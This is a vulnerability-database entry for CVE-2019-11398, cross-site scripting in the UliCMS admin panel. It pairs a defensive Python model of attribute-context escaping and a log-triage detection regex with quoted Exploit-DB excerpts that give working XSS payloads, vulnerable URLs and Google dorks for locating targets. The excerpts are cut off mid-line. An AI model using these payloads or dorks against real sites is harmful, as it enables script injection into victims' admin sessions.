CVE-2019-11398
Published: 2019-05-08
Priority: P4 / 33 · Severity: medium · CVSS 3.0 base score: 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
Exploit: public exploit available (see the Exploit-DB entries below) · EPSS: 3.47% (87.6th percentile)
Multiple cross-site scripting (XSS) vulnerabilities in UliCMS 2019.2 and 2019.1 allow remote attackers to inject arbitrary web script or HTML via the go parameter to admin/index.php, the go parameter to /admin/index.php?register=register, or the error parameter to admin/index.php?action=favicon.
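The public payload for this CVE (`test' accesskey='X' onclick='alert(1)`, see the Exploit-DB entry below) contains no `<`, which tells you the `go` parameter is reflected inside a single-quoted HTML attribute rather than into page text. That context matters for the fix: PHP's `htmlspecialchars()` leaves single quotes alone unless `ENT_QUOTES` is passed (it became the default only in PHP 8.1), so a "we escape everything" template can still be exploitable. The Python below is an added example, not UliCMS code: the hidden-input template is an assumed stand-in for the login form, `html.escape(quote=False/True)` models `htmlspecialchars()` without and with `ENT_QUOTES`, and `flag_request()` is a hypothetical log-review check for the three endpoints named in the description.

```python
"""Model of the attribute-context reflected XSS described for CVE-2019-11398.

Everything here is illustrative: the template, the parameter handling and the
detection regex are assumptions, not UliCMS's actual implementation.
"""
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qsl, unquote, urlsplit

# Payload copied from the Exploit-DB entry, URL-decoded.
PAYLOAD = unquote("test%27%20accesskey=%27X%27%20onclick=%27alert(1)")


def render_hidden_go(go: str, mode: str) -> str:
    """Render an assumed hidden form field that carries `go` back to the server.

    mode = "raw"              -> no escaping (the vulnerable pattern)
    mode = "escape_no_quotes" -> like htmlspecialchars($go) before PHP 8.1
    mode = "escape_quotes"    -> like htmlspecialchars($go, ENT_QUOTES)
    """
    if mode == "raw":
        value = go
    elif mode == "escape_no_quotes":
        value = html.escape(go, quote=False)   # escapes & < > only
    elif mode == "escape_quotes":
        value = html.escape(go, quote=True)    # also escapes ' and "
    else:
        raise ValueError(f"unknown mode {mode!r}")
    return f"<input type='hidden' name='go' value='{value}'>"


class _InputAttrs(HTMLParser):
    """Collect the attributes the browser would see on the <input> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def parse_input_attrs(markup: str) -> dict:
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def injected_event_handlers(markup: str) -> list:
    """Event-handler attributes (on*) that ended up on the tag: any hit means the
    attacker broke out of the value attribute."""
    return sorted(k for k in parse_input_attrs(markup) if k.startswith("on"))


# Parameters the CVE description names, all reflected by admin/index.php.
REFLECTED_PARAMS = {"go", "error"}

# A quote followed by a new attribute assignment (on*, accesskey, style, src, href)
# is the signature of an attribute breakout; this is a hypothetical review heuristic.
_BREAKOUT = re.compile(r"""['"][^'"]*\b(?:on\w+|accesskey|style|src|href)\s*=""", re.I)


def flag_request(uri: str) -> list:
    """Return the reflected parameter names in an admin/index.php request whose
    decoded value looks like an attribute breakout (for access-log triage)."""
    parts = urlsplit(uri)
    if not parts.path.endswith("admin/index.php"):
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in REFLECTED_PARAMS and _BREAKOUT.search(value):
            hits.append(name)
    return hits


if __name__ == "__main__":
    for mode in ("raw", "escape_no_quotes", "escape_quotes"):
        markup = render_hidden_go(PAYLOAD, mode)
        print(f"{mode:18} handlers={injected_event_handlers(markup)}  {markup}")
    print(flag_request("/ulicms/admin/index.php?register=register&go=" + PAYLOAD))
```

Running it shows that both the raw template and the quote-less escaping leave `onclick` as a live attribute, while quote-aware escaping keeps the whole payload inside `value`; `flag_request()` only fires on the admin endpoint and only for the parameters the advisory names, so it will not flood a review with benign `go=dashboard` traffic.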
Affected (2 ranges):
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ulicms | ulicms | — | — |
| ulicms | ulicms | — | — |
CVSS provenance
NVD v3.0: 6.1 MEDIUM, CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
NVD v2.0: 4.3 MEDIUM, AV:N/AC:M/Au:N/C:N/I:P/A:N
No detection rules found.
Exploit-DB (2019-06-10, CVSS 6.1): UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting
---
# Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting
# Google Dork: intext:"by UliCMS"
# Date: 2019-05-12
# Exploit Author: Unk9vvN
# Vendor Homepage: https://en.ulicms.de
# Software Link: https://www.ulicms.de/aktuelles.html?single=ulicms-20191-spitting-lama-ist-fertig
# Version: 2019.1
# Tested on: Kali Linux
# CVE : CVE-2019-11398
# Description
# This vulnerability is in the authenticated state and is located in the CMS management panel; the vulnerability type is Stored, and the vulnerable parameters are as follows.
# Vuln One
# URI: POST /ulicms/admin/index.php?action=languages
# Parameter: name=">alert('UNK9VVN')
# Vuln Two
# URI: POST /ulicms/admin/index.php?action=pages_edit&p
Exploit-DB (2019-04-22, CVSS 6.1): UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting
---
# Exploit Title: UliCMS - 2019.2 , 2019.1 - Multiple Cross-Site Scripting
# Google Dork: intext:"by UliCMS"
# Exploit Author: Kağan EĞLENCE
# Vendor Homepage: https://en.ulicms.de/
# Version: 2019.2 , 2019.1
# CVE : CVE-2019-11398
### Vulnerability 1
Url : http://localhost/ulicms/ulicms/admin/index.php?go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
Vulnerable File : /ulicms/admin/inc/loginform.php
Request Type: GET
Vulnerable Parameter : "go"
Payload: test%27%20accesskey=%27X%27%20onclick=%27alert(1)
Result :
### Vulnerability 2
Url : http://localhost/ulicms/ulicms/admin/index.php?register=register&go=test%27%20accesskey=%27X%27%20onclick=%27alert(1)
Vulnerable File : /ulicms/admin/inc/registerform.php
Request Type: GE
No writeups or analysis indexed.